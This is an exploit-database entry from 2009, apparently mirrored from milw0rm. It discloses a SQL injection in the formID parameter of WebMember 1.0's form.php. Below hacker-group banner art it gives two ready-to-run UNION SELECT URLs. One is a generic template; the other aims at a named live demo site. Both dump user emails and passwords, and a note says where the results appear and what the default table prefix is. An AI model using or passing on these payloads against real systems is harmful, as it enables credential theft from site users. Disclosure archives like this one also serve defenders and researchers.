[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WebMember 1.0 (formID) Remote SQL Injection Vulnerability
# Published : 2009-05-26
# Author : KIM
# Previous Title : ZeeCareers 2.0 (addadminmembercode.php) Add Admin Exploit
# Next Title : Joomla Component Com_Agora 3.0.0 RC1 Remote File Upload Vulnerability


==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                      
                             WebMember 1.0 (formID) Remote SQL Injection Vulnerability                                  
                                                                                                             
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By:  KiM   :::ALGERIAN HaCkEr:::         =     =  
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::E-mail : x0@hotmail.es:::::::               =         =
                =                                                                                    =
                =              Sript : http://www.phpmembers.com                                        =
                =               http://www.phpmembers.com/download.html                              =             
                 =================================== Snakespc ======================================   
   
[x] Note :You must Sign up......

[x] Exploit:
http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
[x] Live demo:
http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--

[x] Note2:
The injection's result will be in the link or inside the "Not Found" message
the default prefix of the table name is mem                                                         
===================================================================================================================
Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ
str0ke.....>>>>.....milw0rm
===================================================================================================================

# www.Syue.com [2009-05-26]